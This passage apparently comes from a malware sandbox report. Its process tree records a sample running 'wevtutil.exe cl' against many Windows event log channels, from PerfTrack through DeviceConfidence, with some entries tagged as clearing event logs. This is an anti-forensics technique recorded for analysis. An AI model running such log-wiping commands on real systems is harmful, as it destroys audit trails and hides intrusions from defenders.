    wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
    3⤵
    PID:4196
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
    3⤵
    PID:4668
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-Admin/Debug"
    3⤵
    PID:4212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Debug"
    3⤵
    PID:4320
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Operational"
    3⤵
    - Clears Windows event logs
    PID:772
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Analytic"
    3⤵
    PID:4368
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Debug"
    3⤵
    - Clears Windows event logs
    PID:3996
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Operational"
    3⤵
    PID:4964
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-IPC/Operational"
    3⤵
    PID:3708
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"
    3⤵
    PID:3916
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Debug"
    3⤵
    PID:1944
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Operational"
    3⤵
    PID:5064
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AAD/Analytic"
    3⤵
    PID:1512
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AAD/Operational"
    3⤵
    PID:4064
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
    3⤵
    PID:1488
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ASN1/Operational"
    3⤵
    PID:2196
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
    3⤵
    PID:4800
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
    3⤵
    - Clears Windows event logs
    PID:4460
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
    3⤵
    - Clears Windows event logs
    PID:2980
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-All-User-Install-Agent/Admin"
    3⤵
    PID:4336
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AllJoyn/Debug"
    3⤵
    PID:624
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AllJoyn/Operational"
    3⤵
    PID:4144
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppHost/Admin"
    3⤵
    PID:1612
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppHost/ApplicationTracing"
    3⤵
    - Clears Windows event logs
    PID:1464
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppHost/Diagnostic"
    3⤵
    PID:5044
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppHost/Internal"
    3⤵
    - Clears Windows event logs
    PID:1244
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
    3⤵
    PID:3832
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
    3⤵
    - Clears Windows event logs
    PID:3568
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
    3⤵
    - Clears Windows event logs
    PID:3968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Deployment"
    3⤵
    PID:4032
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Execution"
    3⤵
    PID:3184
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Admin"
    3⤵
    - Clears Windows event logs
    PID:872
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Analytic"
    3⤵
    PID:3936
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Debug"
    3⤵
    PID:4852
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Diagnostics"
    3⤵
    PID:552
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppModel-State/Debug"
    3⤵
    PID:1152
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppModel-State/Diagnostic"
    3⤵
    PID:5108
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppReadiness/Admin"
    3⤵
    PID:1324
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppReadiness/Debug"
    3⤵
    PID:2248
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppReadiness/Operational"
    3⤵
    PID:3460
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppSruProv"
    3⤵
    PID:2556
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:1496
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Operational"
    3⤵
    PID:5060
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Debug"
    3⤵
    PID:1248
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Diagnostic"
    3⤵
    PID:428
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Operational"
    3⤵
    PID:2928
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Restricted"
    3⤵
    PID:488
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Analytic"
    3⤵
    PID:2972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Operational"
    3⤵
    - Clears Windows event logs
    PID:1660
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
    3⤵
    PID:1576
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
    3⤵
    PID:2868
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
    3⤵
    - Clears Windows event logs
    PID:1476
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
    3⤵
    PID:3340
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"
    3⤵
    PID:880
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
    3⤵
    - Clears Windows event logs
    PID:3388
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"
    3⤵
    - Clears Windows event logs
    PID:4544
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"
    3⤵
    PID:2984
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
    3⤵
    PID:3676
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
    3⤵
    PID:812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
    3⤵
    PID:4380
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Steps-Recorder"
    3⤵
    PID:4656
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Debug"
    3⤵
    PID:2724
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Operational"
    3⤵
    PID:3760
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Performance"
    3⤵
    - Clears Windows event logs
    PID:4264
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Admin"
    3⤵
    PID:4576
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Operational"
    3⤵
    - Clears Windows event logs
    PID:2024
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Admin"
    3⤵
    PID:1276
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Operational"
    3⤵
    PID:1768
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AsynchronousCausality/Causality"
    3⤵
    PID:4556
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
    3⤵
    PID:344
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/GlitchDetection"
    3⤵
    PID:4228
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/Informational"
    3⤵
    - Clears Windows event logs
    PID:3100
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
    3⤵
    PID:2104
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
    3⤵
    PID:960
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/PlaybackManager"
    3⤵
    PID:2356
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
    3⤵
    PID:2112
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
    3⤵
    PID:4572
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"
    3⤵
    PID:272
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUser-Client"
    3⤵
    - Clears Windows event logs
    PID:5012
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"
    3⤵
    - Clears Windows event logs
    PID:264
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"
    3⤵
    - Clears Windows event logs
    PID:4152
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
    3⤵
    PID:4260
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/HCI"
    3⤵
    PID:3296
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/L2CAP"
    3⤵
    PID:3140
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Diagnostic"
    3⤵
    PID:4992
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Performance"
    3⤵
    - Clears Windows event logs
    PID:4888
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"
    3⤵
    PID:1140
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"
    3⤵
    PID:4504
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"
    3⤵
    PID:4328
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Backup"
    3⤵
    PID:4160
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"
    3⤵
    - Clears Windows event logs
    PID:4840
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"
    3⤵
    PID:2344
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Battery/Diagnostic"
    3⤵
    PID:4040
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Biometrics/Analytic"
    3⤵
    PID:1724
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
    3⤵
    PID:1504
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
    3⤵
    PID:2624
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
    3⤵
    PID:932
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker-Driver-Performance/Operational"
    3⤵
    PID:3500
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Management"
    3⤵
    PID:2496
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Operational"
    3⤵
    PID:3468
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker/Tracing"
    3⤵
    PID:3424
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
    3⤵
    PID:2684
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
    3⤵
    PID:3784
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"
    3⤵
    - Clears Windows event logs
    PID:1700
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bluetooth-Bthmini/Operational"
    3⤵
    PID:1128
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
    3⤵
    PID:1932
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bluetooth-Policy/Operational"
    3⤵
    PID:3648
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
    3⤵
    PID:440
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
    3⤵
    PID:2616
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
    3⤵
    PID:3700
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheMonitoring/Analytic"
    3⤵
    - Clears Windows event logs
    PID:1104
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
    3⤵
    PID:1012
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
    3⤵
    - Clears Windows event logs
    PID:3448
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CAPI2/Catalog Database Debug"
    3⤵
    PID:4056
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
    3⤵
    - Clears Windows event logs
    PID:5048
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
    3⤵
    PID:4128
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
    3⤵
    PID:2396
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/ApartmentInitialize"
    3⤵
    - Clears Windows event logs
    PID:536
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/ApartmentUninitialize"
    3⤵
    PID:4480
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/Call"
    3⤵
    PID:4720
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/CreateInstance"
    3⤵
    PID:4520
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/ExtensionCatalog"
    3⤵
    PID:4828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/FreeUnusedLibrary"
    3⤵
    PID:4724
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/RundownInstrumentation"
    3⤵
    - Clears Windows event logs
    PID:1084
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COMRuntime/Activations"
    3⤵
    - Clears Windows event logs
    PID:3396
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COMRuntime/MessageProcessing"
    3⤵
    PID:4744
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
    3⤵
    PID:916
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
    3⤵
    PID:3960
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
    3⤵
    PID:1056
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"
    3⤵
    - Clears Windows event logs
    PID:4032
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"
    3⤵
    PID:4564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Cleanmgr/Diagnostic"
    3⤵
    PID:2028
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
    3⤵
    PID:2256
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CloudStore/Debug"
    3⤵
    - Clears Windows event logs
    PID:4348
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CloudStore/Operational"
    3⤵
    PID:4092
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
    3⤵
    PID:5076
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
    3⤵
    PID:4796
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
    3⤵
    PID:3480
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
    3⤵
    PID:5032
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
    3⤵
    PID:4884
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Analytic"
    3⤵
    - Clears Windows event logs
    PID:4220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Operational"
    3⤵
    PID:4812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Debug"
    3⤵
    - Clears Windows event logs
    PID:4880
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Operational"
    3⤵
    PID:4760
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Debug"
    3⤵
    - Clears Windows event logs
    PID:4932
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Operational"
    3⤵
    PID:2448
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Debug"
    3⤵
    PID:628
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Operational"
    3⤵
    PID:1452
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CoreApplication/Diagnostic"
    3⤵
    PID:4976
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CoreApplication/Operational"
    3⤵
    PID:4016
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CoreApplication/Tracing"
    3⤵
    PID:3112
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"
    3⤵
    - Clears Windows event logs
    PID:3592
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"
    3⤵
    PID:4280
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CoreWindow/Analytic"
    3⤵
    - Clears Windows event logs
    PID:1020
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CoreWindow/Debug"
    3⤵
    PID:3884
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
    3⤵
    PID:1332
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
    3⤵
    PID:2716
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crashdump/Operational"
    3⤵
    PID:4204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
    3⤵
    PID:3044
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-BCRYPT/Analytic"
    3⤵
    PID:2816
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-CNG/Analytic"
    3⤵
    PID:4876
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"
    3⤵
    - Clears Windows event logs
    PID:1676
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Debug"
    3⤵
    - Clears Windows event logs
    PID:60
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Operational"
    3⤵
    - Clears Windows event logs
    PID:688
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-DSSEnh/Analytic"
    3⤵
    PID:4020
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-NCrypt/Operational"
    3⤵
    PID:2136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
    3⤵
    PID:2024
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-RSAEnh/Analytic"
    3⤵
    PID:1276
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
    3⤵
    PID:1768
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
    3⤵
    PID:4556
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Analytic"
    3⤵
    PID:3132
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Operational"
    3⤵
    PID:4476
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DAMM/Diagnostic"
    3⤵
    PID:3088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
    3⤵
    - Clears Windows event logs
    PID:912
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DDisplay/Analytic"
    3⤵
    PID:1156
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DDisplay/Logging"
    3⤵
    PID:4300
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DLNA-Namespace/Analytic"
    3⤵
    PID:4332
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
    3⤵
    PID:4628
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DSC/Admin"
    3⤵
    PID:280
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DSC/Analytic"
    3⤵
    PID:260
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DSC/Debug"
    3⤵
    PID:4400
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DSC/Operational"
    3⤵
    PID:288
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
    3⤵
    PID:3324
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
    3⤵
    PID:4772
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
    3⤵
    - Clears Windows event logs
    PID:2996
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
    3⤵
    - Clears Windows event logs
    PID:4776
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
    3⤵
    - Clears Windows event logs
    PID:3004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Data-Pdf/Debug"
    3⤵
    PID:8
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/Admin"
    3⤵
    PID:1140
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/CrashRecovery"
    3⤵
    - Clears Windows event logs
    PID:4504
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
    3⤵
    PID:4328
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
    3⤵
    - Clears Windows event logs
    PID:4160
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
    3⤵
    PID:4840
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Deduplication/Diagnostic"
    3⤵
    PID:2344
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Deduplication/Operational"
    3⤵
    - Clears Windows event logs
    PID:4040
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Deduplication/Performance"
    3⤵
    PID:1724
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Deduplication/Scrubbing"
    3⤵
    - Clears Windows event logs
    PID:1060
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Defrag-Core/Debug"
    3⤵
    - Clears Windows event logs
    PID:788
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
    3⤵
    PID:4732
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DesktopActivityModerator/Diagnostic"
    3⤵
    PID:2548
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DesktopWindowManager-Diag/Diagnostic"
    3⤵
    PID:3364
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceAssociationService/Performance"
    3⤵
    PID:3508
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceConfidence/Analytic"
    3⤵
    - Clears Windows event logs
    PID:3560
